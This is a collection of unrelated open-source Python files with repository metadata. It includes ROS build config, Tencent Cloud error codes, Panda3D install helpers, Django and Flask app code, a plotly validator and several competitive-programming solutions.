amitf82/Final_Proj_Mobile_Robotics
14cfe7b182df1294a873283c91688c8ca9526fee
435a6c1562df030fc462fe1b0a84f968a27a2b85
refs/heads/master
2021-01-20T03:22:51.387095
2017-04-30T08:25:33
2017-04-30T08:25:33
89,532,221
0
0
null
null
null
null
UTF-8
Python
false
false
639
py
# generated from genmsg/cmake/pkg-genmsg.context.in

messages_str = "/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg/VecOfDoubles.msg"
services_str = ""
pkg_name = "custom_msgs"
dependencies_str = "roscpp;std_msgs"
langs = "gencpp;genlisp;genpy"
dep_include_paths_str = "custom_msgs;/home/user/ros_ws/src/learning_ros/Part_1/custom_msgs/msg;roscpp;/opt/ros/indigo/share/roscpp/cmake/../msg;std_msgs;/opt/ros/indigo/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/indigo/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
f69ccb7f33652833c315b76a7a2d83e1524f1e29
4dfd539c530c5cff6874f2fa0c06ffd893212ad3
/tencentcloud/yunjing/v20180228/errorcodes.py
c9d51af5bf9ec25e5d48a99b9a144f01510b9ba7
[]
no_license
TencentCloud/tencentcloud-sdk-python-intl-en
aac605d1a0458b637ba29eb49f6f166fe844a269
042b4d7fb609d4d240728197901b46008b35d4b0
refs/heads/master
2023-09-01T19:39:27.436454
2023-09-01T04:02:15
2023-09-01T04:02:15
227,834,644
4
6
null
2023-07-17T08:56:56
2019-12-13T12:23:52
Python
UTF-8
Python
false
false
3,195
py
# -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


# The agent is offline.
FAILEDOPERATION_AGENTOFFLINE = 'FailedOperation.AgentOffline'

# Failed to deactivate CWP Pro.
FAILEDOPERATION_CLOSEPROVERSION = 'FailedOperation.CloseProVersion'

# Failed to create a port acquisition task.
FAILEDOPERATION_CREATEOPENPORTTASK = 'FailedOperation.CreateOpenPortTask'

# Failed to create a real-time process acquisition task.
FAILEDOPERATION_CREATEPROCESSTASK = 'FailedOperation.CreateProcessTask'

# Failed to export.
FAILEDOPERATION_EXPORT = 'FailedOperation.Export'

# The server was uninstalled.
FAILEDOPERATION_MACHINEDELETE = 'FailedOperation.MachineDelete'

# The real-time port pulling task does not exist.
FAILEDOPERATION_OPENPORTTASKNOTFOUND = 'FailedOperation.OpenPortTaskNotFound'

# Failed to activate CWP Pro.
FAILEDOPERATION_OPENPROVERSION = 'FailedOperation.OpenProVersion'

# Failed to isolate all or part of servers.
FAILEDOPERATION_PARTSEPARATE = 'FailedOperation.PartSeparate'

# Unable to disable the prepaid Pro edition. Please disable it in Billing Center.
FAILEDOPERATION_PREPAYMODE = 'FailedOperation.PrePayMode'

# The real-time process pulling task does not exist.
FAILEDOPERATION_PROCESSTASKNOTFOUND = 'FailedOperation.ProcessTaskNotFound'

# Failed to recover the trojan.
FAILEDOPERATION_RECOVER = 'FailedOperation.Recover'

# Failed to scan for vulnerabilities again.
FAILEDOPERATION_RESCANVUL = 'FailedOperation.RescanVul'

# The server already has a rescan task in progress.
FAILEDOPERATION_RESCANVULPROCESSINUSE = 'FailedOperation.RescanVulProcessInUse'

# Failed to isolate a single server.
FAILEDOPERATION_SINGLESEPARATE = 'FailedOperation.SingleSeparate'

# Internal error.
INTERNALERROR = 'InternalError'

# The time range format is incorrect.
INVALIDPARAMETER_DATERANGE = 'InvalidParameter.DateRange'

# Invalid request.
INVALIDPARAMETER_ILLEGALREQUEST = 'InvalidParameter.IllegalRequest'

# Incorrect parameter format.
INVALIDPARAMETER_INVALIDFORMAT = 'InvalidParameter.InvalidFormat'

# Missing parameter.
INVALIDPARAMETER_MISSINGPARAMETER = 'InvalidParameter.MissingParameter'

# Parameter parsing error.
INVALIDPARAMETER_PARSINGERROR = 'InvalidParameter.ParsingError'

# The tag name cannot contain more than 15 characters.
INVALIDPARAMETERVALUE_TAGNAMELENGTHLIMIT = 'InvalidParameterValue.TagNameLengthLimit'

# The maximum number of entries to be added in batches is exceeded.
LIMITEXCEEDED_AREAQUOTA = 'LimitExceeded.AreaQuota'

# Missing parameter.
MISSINGPARAMETER = 'MissingParameter'

# The resource does not exist.
RESOURCENOTFOUND = 'ResourceNotFound'
004a5ea7c590722cada44dc62d7244160bdbb780
ce2e74d15fa3159b596eae72bb4f0e2a96006c29
/The_Basics/Chapter14/testerr.py
45b8cca05254dd9de0a9d941064e370a36f470a2
[]
no_license
cametan001/Learning_to_Program
595fcd0d97b22abb9904957012fbed95c835426c
322716089025d2b21533aff9de33c18099eb30cb
refs/heads/master
2016-09-15T20:20:48.185428
2010-11-11T14:26:47
2010-11-11T14:26:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
152
py
# -*- coding: utf-8 -*-
from raiserr import *

try:
    print div42()
except ZeroDivisionError:
    print "Please enter a value other than 0."
f3a6c973676ba8b267b8fa1e5199895b9be7deb1
ba0cbdae81c171bd4be7b12c0594de72bd6d625a
/MyToontown/Panda3D-1.9.0/direct/pyinst/installutils.py
66eca013464126d08d7eeba3bad65df0cecb3bb2
[ "BSD-3-Clause", "BSD-2-Clause" ]
permissive
sweep41/Toontown-2016
65985f198fa32a832e762fa9c59e59606d6a40a3
7732fb2c27001264e6dd652c057b3dc41f9c8a7d
refs/heads/master
2021-01-23T16:04:45.264205
2017-06-04T02:47:34
2017-06-04T02:47:34
93,279,679
0
0
null
null
null
null
UTF-8
Python
false
false
2,790
py
# copyright 1999 McMillan Enterprises, Inc.
# demo code - use as you please.
import os
import stat
import sys


def copyFile(srcFiles, destFile, append=0):
    '''
    Copy one or more files to another file.
    If srcFiles is a list, then all will be concatenated together to destFile.
    The append flag is also valid for single file copies.
    destFile will have the mode, ownership and timestamp of the last file copied/appended.
    '''
    if type(srcFiles) == type([]):
        # in case we need to overwrite on the first file...
        copyFile(srcFiles[0], destFile, append)
        for file in srcFiles[1:]:
            copyFile(file, destFile, 1)
        return
    mode = 'wb'
    if append:
        mode = 'ab'
    print " ", srcFiles, "->",
    input = open(srcFiles, 'rb')
    if input:
        print destFile
        output = open(destFile, mode)
        while 1:
            bytesRead = input.read(8192)
            if bytesRead:
                output.write(bytesRead)
            else:
                break
        input.close()
        output.close()
        stats = os.stat(srcFiles)
        os.chmod(destFile, stats[stat.ST_MODE])
        try:
            # FAT16 file systems have only one file time
            os.utime(destFile, (stats[stat.ST_ATIME], stats[stat.ST_MTIME]))
        except:
            pass
        try:
            os.chown(destFile, stats[stat.ST_UID], stats[stat.ST_GID])
        except:
            pass


def ensure(dirct):
    # create dirct and any missing intermediate directories
    dirnm = dirct
    plist = []
    try:
        while not os.path.exists(dirnm):
            dirnm, base = os.path.split(dirnm)
            if base == '':
                break
            plist.insert(0, base)
        for d in plist:
            dirnm = os.path.join(dirnm, d)
            os.mkdir(dirnm)
    except:
        return 0
    return 1


def getinstalldir(prompt="Enter an installation directory: "):
    while 1:
        installdir = raw_input(prompt)
        installdir = os.path.normpath(installdir)
        if ensure(installdir):
            break
        else:
            print installdir, "is not a valid pathname"
            r = raw_input("Try again (y/n)?: ")
            if r in 'nN':
                sys.exit(0)
    return installdir


def installCArchive(nm, basedir, suffixdir):
    import carchive_rt
    fulldir = os.path.join(basedir, suffixdir)
    if ensure(fulldir):
        pkg = carchive_rt.CArchive(nm)
        for fnm in pkg.contents():
            stuff = pkg.extract(fnm)[1]
            outnm = os.path.join(fulldir, fnm)
            if ensure(os.path.dirname(outnm)):
                open(outnm, 'wb').write(stuff)
        pkg = None
        os.remove(nm)
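# --- Editor's note (added; not part of the original file): a hedged usage
# sketch for the helpers above, in the module's own Python 2 style; the paths
# are hypothetical.
#
# if ensure('/tmp/demo/nested/dir'):
#     copyFile(['a.bin', 'b.bin'], '/tmp/demo/nested/dir/combined.bin')
#     installdir = getinstalldir("Where should the demo be installed? ")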
8c3aaaf2d9408dc92686db92188f28478d2d1435
33a32d7d7b482206852a7bbeb7fa507f55ca53dd
/models/category.py
3f0f824e93bb71a744c8707273430117db463718
[]
no_license
stanislawK/bookshelf
94277b0103b522302782c3a5fed9e4c790d6f86f
fa68dda7f88c83080ad9a51a1ed16994b2bca054
refs/heads/master
2020-05-21T18:44:14.396967
2019-05-20T10:04:06
2019-05-20T10:04:06
186,138,290
0
0
null
2019-05-20T08:11:44
2019-05-11T13:47:42
Python
UTF-8
Python
false
false
494
py
from bookshelf.extensions import db


class CategoryModel(db.Model):
    __tablename__ = 'categories'

    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(50), nullable=False)

    @classmethod
    def find_by_name(cls, _name):
        return cls.query.filter_by(name=_name).first()

    @classmethod
    def find_by_id(cls, _id):
        return cls.query.filter_by(id=_id).first()

    def save_to_db(self):
        db.session.add(self)
        db.session.commit()
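# --- Editor's note (added; not part of the original file): a hedged usage
# sketch for the model above. It assumes an active Flask app context and an
# initialized database (both supplied by bookshelf.extensions elsewhere); the
# category name is hypothetical.
#
# category = CategoryModel(name='Fantasy')
# category.save_to_db()
# assert CategoryModel.find_by_name('Fantasy').id == category.id
# assert CategoryModel.find_by_id(category.id).name == 'Fantasy'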
4f0372e774eb8b7d1ce6d898124f7ccc4c782e29
d41d18d3ea6edd2ec478b500386375a8693f1392
/plotly/validators/contourcarpet/colorbar/tickfont/_family.py
15aef26e53e16075df0e8f184ac20f62ac43a276
[ "MIT" ]
permissive
miladrux/plotly.py
38921dd6618650d03be9891d6078e771ffccc99a
dbb79e43e2cc6c5762251537d24bad1dab930fff
refs/heads/master
2020-03-27T01:46:57.497871
2018-08-20T22:37:38
2018-08-20T22:37:38
145,742,203
1
0
MIT
2018-08-22T17:37:07
2018-08-22T17:37:07
null
UTF-8
Python
false
false
514
py
import _plotly_utils.basevalidators


class FamilyValidator(_plotly_utils.basevalidators.StringValidator):

    def __init__(
        self,
        plotly_name='family',
        parent_name='contourcarpet.colorbar.tickfont',
        **kwargs
    ):
        super(FamilyValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type='colorbars',
            no_blank=True,
            role='style',
            strict=True,
            **kwargs
        )
6988d0bf81d29b125be98f70f357cda2d3f89cd1
6ab810f6ca51dc2e2d0b7197fc1866b738ca70a2
/Contest/WC213/5555.统计字典序元音字符串的数目.py
eb45f72780ddd673963c0da027b281fa4e3be4db
[ "MIT" ]
permissive
ApocalypseMac/LeetCode
2309223be0c3e2969850cf1770eef2a447d39317
84c229eaf5a2e617ca00cabed04dd76d508d60b8
refs/heads/master
2023-04-14T19:22:34.340333
2021-03-28T05:20:40
2021-03-28T05:20:40
282,896,723
1
2
MIT
2020-07-29T05:05:19
2020-07-27T12:49:40
Python
UTF-8
Python
false
false
310
py
class Solution:
    def countVowelStrings(self, n: int) -> int:
        dp = [[0] * 5 for _ in range(n + 1)]
        for i in range(n + 1):
            dp[i][0] = 1
        for i in range(1, n + 1):
            for j in range(1, 5):
                dp[i][j] = dp[i-1][j] + dp[i][j-1]
        return sum(dp[-1])
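# --- Editor's note (added; not part of the original file): the DP above counts
# length-n strings over {a,e,i,o,u} whose letters are in non-decreasing order;
# dp[i][j] is the number of such strings of length i drawn from the first j+1
# vowels. Two values known from the problem statement:
assert Solution().countVowelStrings(1) == 5   # 'a', 'e', 'i', 'o', 'u'
assert Solution().countVowelStrings(2) == 15  # equivalently C(2 + 4, 4)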
0d6c5c1c8e12278419687cd92ee29fc5328e85ba
f12770add2dd48d2262612fcb1aaecc4a714b4fb
/django/remoteomd/remoteomddata/api/urls.py
8080bdec717ba226682f54440bf918ee6f7351af
[]
no_license
github188/vending
3558666b57b37e843e72d194d80f6a8ef5dbc7a4
ce3e2f1fcbb4d132f7b01a99400d917d7ca174a6
refs/heads/master
2021-06-16T09:54:09.214694
2017-01-28T01:31:30
2017-01-28T01:31:30
null
0
0
null
null
null
null
UTF-8
Python
false
false
9,722
py
from django.conf.urls import url, include
from rest_framework.authtoken import views

from remoteomddata.api.views.coinmachine import CoinChangeListAPIView, CoinChangeCreateAPIView, CoinChangeDetailAPIView, \
    CoinChangeUpdateAPIView, CoinChangeDeleteAPIView
from remoteomddata.api.views.config import ConfigListAPIView, ConfigCreateAPIView, ConfigDetailAPIView, \
    ConfigUpdateAPIView, ConfigDeleteAPIView
from remoteomddata.api.views.group import GroupListAPIView, GroupCreateAPIView, GroupDetailAPIView, GroupUpdateAPIView, \
    GroupDeleteAPIView
from remoteomddata.api.views.member import MemberListAPIView, MemberCreateAPIView, MemberDetailAPIView, \
    MemberUpdateAPIView, MemberDeleteAPIView
from remoteomddata.api.views.moneycharge import MoneyChargeListAPIView, MoneyChargeCreateAPIView, \
    MoneyChargeDetailAPIView, MoneyChargeUpdateAPIView, MoneyChargeDeleteAPIView
from remoteomddata.api.views.ordermain import OrderMainDeleteAPIView, OrderMainUpdateAPIView, OrderMainDetailAPIView, \
    OrderMainCreateAPIView, OrderMainListAPIView
from remoteomddata.api.views.permission.permissionview import adminPermView
from remoteomddata.api.views.product import ProductListAPIView, ProductCreateAPIView, ProductDetailAPIView, \
    ProductUpdateAPIView, ProductDeleteAPIView
from remoteomddata.api.views.productcategory import ProductCategoryListAPIView, ProductCategoryCreateAPIView, \
    ProductCategoryDetailAPIView, ProductCategoryUpdateAPIView, ProductCategoryDeleteAPIView
from remoteomddata.api.views.productprovider import ProductProviderListAPIView, ProductProviderCreateAPIView, \
    ProductProviderDetailAPIView, ProductProviderUpdateAPIView, ProductProviderDeleteAPIView
from remoteomddata.api.views.slot import SlotListAPIView, SlotCreateAPIView, SlotDetailAPIView, SlotUpdateAPIView, \
    SlotDeleteAPIView
from remoteomddata.api.views.slotstatus import SlotStatusListAPIView, SlotStatusCreateAPIView, SlotStatusDetailAPIView, \
    SlotStatusUpdateAPIView, SlotStatusDeleteAPIView
from remoteomddata.api.views.user import UserListAPIView, UserCreateAPIView, UserDetailAPIView, UserUpdateAPIView, \
    UserDeleteAPIView
from remoteomddata.api.views.vendingmachine import VendingMachineListAPIView, VendingMachineCreateAPIView, \
    VendingMachineDetailAPIView, VendingMachineUpdateAPIView, VendingMachineDeleteAPIView
from remoteomddata.api.views.vendingmachinetype import VendingMachineTypeListAPIView, VendingMachineTypeCreateAPIView, \
    VendingMachineTypeDetailAPIView, VendingMachineTypeUpdateAPIView, VendingMachineTypeDeleteAPIView

urlpatterns = [
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
    url(r'^api-token-auth/', views.obtain_auth_token, name='rest_framework_token'),
    url(r'^perm/$', adminPermView, name='api-perm'),

    url(r'^moneycharge/$', MoneyChargeListAPIView.as_view(), name='moneycharge'),
    url(r'^moneycharge/create/$', MoneyChargeCreateAPIView.as_view(), name='moneycharge-create'),
    url(r'^moneycharge/(?P<id>[\w-]+)/$', MoneyChargeDetailAPIView.as_view(), name='moneycharge-detail'),
    url(r'^moneycharge/edit/(?P<id>[\w-]+)/$', MoneyChargeUpdateAPIView.as_view(), name='moneycharge-update'),
    url(r'^moneycharge/delete/(?P<id>[\w-]+)/$', MoneyChargeDeleteAPIView.as_view(), name='moneycharge-delete'),

    url(r'^group/$', GroupListAPIView.as_view(), name='group'),
    url(r'^group/create/$', GroupCreateAPIView.as_view(), name='group-create'),
    url(r'^group/(?P<id>[\w-]+)/$', GroupDetailAPIView.as_view(), name='group-detail'),
    url(r'^group/edit/(?P<id>[\w-]+)/$', GroupUpdateAPIView.as_view(), name='group-update'),
    url(r'^group/delete/(?P<id>[\w-]+)/$', GroupDeleteAPIView.as_view(), name='group-delete'),

    url(r'^ordermain/$', OrderMainListAPIView.as_view(), name='ordermain'),
    url(r'^ordermain/create/$', OrderMainCreateAPIView.as_view(), name='ordermain-create'),
    url(r'^ordermain/(?P<id>[\w-]+)/$', OrderMainDetailAPIView.as_view(), name='ordermain-detail'),
    url(r'^ordermain/edit/(?P<id>[\w-]+)/$', OrderMainUpdateAPIView.as_view(), name='ordermain-update'),
    url(r'^ordermain/delete/(?P<id>[\w-]+)/$', OrderMainDeleteAPIView.as_view(), name='ordermain-delete'),

    url(r'^product/$', ProductListAPIView.as_view(), name='product'),
    url(r'^product/create/$', ProductCreateAPIView.as_view(), name='product-create'),
    url(r'^product/(?P<id>[\w-]+)/$', ProductDetailAPIView.as_view(), name='product-detail'),
    url(r'^product/edit/(?P<id>[\w-]+)/$', ProductUpdateAPIView.as_view(), name='product-update'),
    url(r'^product/delete/(?P<id>[\w-]+)/$', ProductDeleteAPIView.as_view(), name='product-delete'),

    url(r'^productcategory/$', ProductCategoryListAPIView.as_view(), name='productcategory'),
    url(r'^productcategory/create/$', ProductCategoryCreateAPIView.as_view(), name='productcategory-create'),
    url(r'^productcategory/(?P<id>[\w-]+)/$', ProductCategoryDetailAPIView.as_view(), name='productcategory-detail'),
    url(r'^productcategory/edit/(?P<id>[\w-]+)/$', ProductCategoryUpdateAPIView.as_view(), name='productcategory-update'),
    url(r'^productcategory/delete/(?P<id>[\w-]+)/$', ProductCategoryDeleteAPIView.as_view(), name='productcategory-delete'),

    url(r'^productprovider/$', ProductProviderListAPIView.as_view(), name='productprovider'),
    url(r'^productprovider/create/$', ProductProviderCreateAPIView.as_view(), name='productprovider-create'),
    url(r'^productprovider/(?P<id>[\w-]+)/$', ProductProviderDetailAPIView.as_view(), name='productprovider-detail'),
    url(r'^productprovider/edit/(?P<id>[\w-]+)/$', ProductProviderUpdateAPIView.as_view(), name='productprovider-update'),
    url(r'^productprovider/delete/(?P<id>[\w-]+)/$', ProductProviderDeleteAPIView.as_view(), name='productprovider-delete'),

    url(r'^slot/$', SlotListAPIView.as_view(), name='slot'),
    url(r'^slot/create/$', SlotCreateAPIView.as_view(), name='slot-create'),
    url(r'^slot/(?P<id>[\w-]+)/$', SlotDetailAPIView.as_view(), name='slot-detail'),
    url(r'^slot/edit/(?P<id>[\w-]+)/$', SlotUpdateAPIView.as_view(), name='slot-update'),
    url(r'^slot/delete/(?P<id>[\w-]+)/$', SlotDeleteAPIView.as_view(), name='slot-delete'),

    # note: the slotstatus routes below reuse the 'slot*' names, exactly as in
    # the original source; reverse() lookups will resolve to these later entries
    url(r'^slotstatus/$', SlotStatusListAPIView.as_view(), name='slot'),
    url(r'^slotstatus/create/$', SlotStatusCreateAPIView.as_view(), name='slot-create'),
    url(r'^slotstatus/(?P<id>[\w-]+)/$', SlotStatusDetailAPIView.as_view(), name='slot-detail'),
    url(r'^slotstatus/edit/(?P<id>[\w-]+)/$', SlotStatusUpdateAPIView.as_view(), name='slot-update'),
    url(r'^slotstatus/delete/(?P<id>[\w-]+)/$', SlotStatusDeleteAPIView.as_view(), name='slot-delete'),

    url(r'^user/$', UserListAPIView.as_view(), name='user'),
    url(r'^user/create/$', UserCreateAPIView.as_view(), name='user-create'),
    url(r'^user/(?P<id>[\w-]+)/$', UserDetailAPIView.as_view(), name='user-detail'),
    url(r'^user/edit/(?P<id>[\w-]+)/$', UserUpdateAPIView.as_view(), name='user-update'),
    url(r'^user/delete/(?P<id>[\w-]+)/$', UserDeleteAPIView.as_view(), name='user-delete'),

    url(r'^member/$', MemberListAPIView.as_view(), name='member'),
    url(r'^member/create/$', MemberCreateAPIView.as_view(), name='member-create'),
    url(r'^member/(?P<id>[\w-]+)/$', MemberDetailAPIView.as_view(), name='member-detail'),
    url(r'^member/edit/(?P<id>[\w-]+)/$', MemberUpdateAPIView.as_view(), name='member-update'),
    url(r'^member/delete/(?P<id>[\w-]+)/$', MemberDeleteAPIView.as_view(), name='member-delete'),

    url(r'^vendingmachine/$', VendingMachineListAPIView.as_view(), name='vendingmachine'),
    url(r'^vendingmachine/create/$', VendingMachineCreateAPIView.as_view(), name='vendingmachine-create'),
    url(r'^vendingmachine/(?P<id>[\w-]+)/$', VendingMachineDetailAPIView.as_view(), name='vendingmachine-detail'),
    url(r'^vendingmachine/edit/(?P<id>[\w-]+)/$', VendingMachineUpdateAPIView.as_view(), name='vendingmachine-update'),
    url(r'^vendingmachine/delete/(?P<id>[\w-]+)/$', VendingMachineDeleteAPIView.as_view(), name='vendingmachine-delete'),

    url(r'^vendingmachinetype/$', VendingMachineTypeListAPIView.as_view(), name='vendingmachinetype'),
    url(r'^vendingmachinetype/create/$', VendingMachineTypeCreateAPIView.as_view(), name='vendingmachinetype-create'),
    url(r'^vendingmachinetype/(?P<id>[\w-]+)/$', VendingMachineTypeDetailAPIView.as_view(), name='vendingmachinetype-detail'),
    url(r'^vendingmachinetype/edit/(?P<id>[\w-]+)/$', VendingMachineTypeUpdateAPIView.as_view(), name='vendingmachinetype-update'),
    url(r'^vendingmachinetype/delete/(?P<id>[\w-]+)/$', VendingMachineTypeDeleteAPIView.as_view(), name='vendingmachinetype-delete'),

    url(r'^config/$', ConfigListAPIView.as_view(), name='config'),
    url(r'^config/create/$', ConfigCreateAPIView.as_view(), name='config-create'),
    url(r'^config/(?P<id>[\w-]+)/$', ConfigDetailAPIView.as_view(), name='config-detail'),
    url(r'^config/(?P<id>[\w-]+)/edit/$', ConfigUpdateAPIView.as_view(), name='config-update'),
    url(r'^config/(?P<id>[\w-]+)/delete/$', ConfigDeleteAPIView.as_view(), name='config-delete'),

    url(r'^coinchangelog/$', CoinChangeListAPIView.as_view(), name='coinchange'),
    url(r'^coinchangelog/create/$', CoinChangeCreateAPIView.as_view(), name='coinchange-create'),
    url(r'^coinchangelog/(?P<id>[\w-]+)/$', CoinChangeDetailAPIView.as_view(), name='coinchange-detail'),
    url(r'^coinchangelog/edit/(?P<id>[\w-]+)/$', CoinChangeUpdateAPIView.as_view(), name='coinchange-update'),
    url(r'^coinchangelog/delete/(?P<id>[\w-]+)/$', CoinChangeDeleteAPIView.as_view(), name='coinchange-delete'),
]
5a2519e963859ae158490a2f5abc861b2d5ddaed
9805edf2b923c74cf72a3cfb4c2c712255256f15
/python/041_first_missing_positive.py
00bc37e88ed085cdb52e6a5065ea4211b936dbd3
[ "MIT" ]
permissive
jixinfeng/leetcode-soln
5b28e49c2879cdff41c608fc03628498939b0e99
24cf8d5f1831e838ea99f50ce4d8f048bd46c136
refs/heads/master
2022-10-12T17:02:53.329565
2022-10-06T03:21:56
2022-10-06T03:21:56
69,371,757
0
1
null
null
null
null
UTF-8
Python
false
false
1,004
py
""" Given an unsorted integer array, find the first missing positive integer. For example, Given [1,2,0] return 3, and [3,4,-1,1] return 2. Your algorithm should run in O(n) time and uses constant space. """ class Solution(object): def firstMissingPositive(self, nums): """ :type nums: List[int] :rtype: int """ if nums is None or nums == []: return 1 i = 0 n = len(nums) while i < n: if nums[i] > 0 and nums[i] < n and nums[i] != nums[nums[i] - 1]: nums[nums[i] - 1], nums[i] = nums[i], nums[nums[i] - 1] else: i += 1 for i in range(n): if nums[i] != i + 1: return i + 1 return n + 1 a = Solution() assert a.firstMissingPositive([1,2,0]) == 3 assert a.firstMissingPositive([3,4,-1,1]) == 2 assert a.firstMissingPositive([2]) == 1 assert a.firstMissingPositive([1,1]) == 2 assert a.firstMissingPositive([1000,-1]) == 1
61b010f0c53d635bc3d60ea40135546e539a1c46
60e4baae4d6b323b3d3b656df3a7b0ea3ca40ef2
/project/apps/content/migrations/0011_auto_20180112_0303.py
45634aba944d38cfd3ac6dae8c65c055ac45551b
[]
no_license
Burzhun/Big-django-project
a03a61a15ee75f49324ad7ea51372b6b013d1650
1a71f974b7b5399a45862711b5f858c0d4af50d2
refs/heads/master
2020-04-11T00:16:06.211039
2018-12-11T19:13:38
2018-12-11T19:13:38
161,381,283
0
0
null
null
null
null
UTF-8
Python
false
false
1,266
py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-12 03:03
from __future__ import unicode_literals

from django.utils import timezone
from django.db import migrations
from itertools import chain
import json


def migrate_published_dates(apps, schema_editor):
    article_pages = apps.get_model('content', 'ArticlePage').objects.all()
    news_pages = apps.get_model('content', 'NewsPage').objects.all()
    blog_pages = apps.get_model('content', 'BlogPage').objects.all()

    for page in chain(article_pages, news_pages, blog_pages):
        page.published_at = page.go_live_at
        page.go_live_at = None
        page.save()

        revision = page.revisions.order_by('-created_at', '-id').first()
        if not revision:
            continue
        content_json = json.loads(revision.content_json)
        content_json["published_at"] = str(page.published_at)
        try:
            del content_json["go_live_at"]
        except:
            pass
        revision.content_json = json.dumps(content_json)
        revision.save()


class Migration(migrations.Migration):

    dependencies = [
        ('content', '0010_auto_20180112_0254'),
    ]

    operations = [
        migrations.RunPython(migrate_published_dates),
    ]
c09e01caaebea0f93a9e3aa35d47a7ed3b477620
d96787f92bd86c8d8bcf01a4e7ec8f7feec24194
/kattis/acm/solution.py
26e0a74268c2f86a516dd1d097fcb4055afcc15e
[]
no_license
iandioch/solutions
133cbc3af58fadcde0b2e981fb0e7d05801070a7
8b3e458b3c01179ddf776bfbb897f263f22f3693
refs/heads/master
2023-04-09T03:39:16.952817
2023-03-15T20:00:53
2023-03-15T20:00:53
47,693,495
48
40
null
2019-10-22T14:52:59
2015-12-09T13:36:55
Python
UTF-8
Python
false
false
477
py
solved = {}  # map question to time solved
tries_before_solving = {}
while True:
    p = input().split()
    if len(p) == 1:
        break
    time = int(p[0])
    q = p[1]
    if q in solved:
        continue
    if q in tries_before_solving:
        tries_before_solving[q] += 1
    else:
        tries_before_solving[q] = 1
    if p[2] == 'right':
        solved[q] = time
print(len(solved), end=' ')
print(sum([solved[x] + 20*(tries_before_solving[x]-1) for x in solved]))
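# --- Editor's note (added; not part of the original file): the scoring rule
# above on a hypothetical contest log. Problem A is solved at minute 20 on the
# first try; B is wrong at 40 and solved at 60, costing one 20-minute penalty.
# For that input the program would print "2 100":
demo_solved = {'A': 20, 'B': 60}
demo_tries = {'A': 1, 'B': 2}
assert sum(demo_solved[x] + 20 * (demo_tries[x] - 1) for x in demo_solved) == 100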